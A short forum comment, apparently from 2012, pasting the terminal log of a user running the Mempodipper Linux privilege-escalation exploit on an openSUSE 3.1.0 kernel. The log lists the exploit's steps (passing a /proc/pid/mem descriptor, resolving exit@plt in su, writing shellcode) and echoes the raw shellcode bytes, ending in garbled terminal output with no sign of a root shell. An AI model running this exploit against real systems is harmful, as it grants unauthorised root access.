( LGee | 2012. 01. 23., Mon – 13:27 )

openSUSE 3.1.0-1.2-desktop x86_64


$ ./mempodipper.bin
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6936/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x25e0.
[+] Calculating su padding.
[+] Seeking to offset 0x25d7.
[+] Executing su with shellcode.
su: user H1ÿ°iH1ÿ°j@·@¶°!H»//bin/shHÁSH‰çH1Ûf»-iSH‰áH1ÀPQWH‰æH1Ò°; does not exist
^[[?1;2c^[[?1;2c^[[?1;2c^[[?1;2c$ 1;2c1;2c1;2c1;2c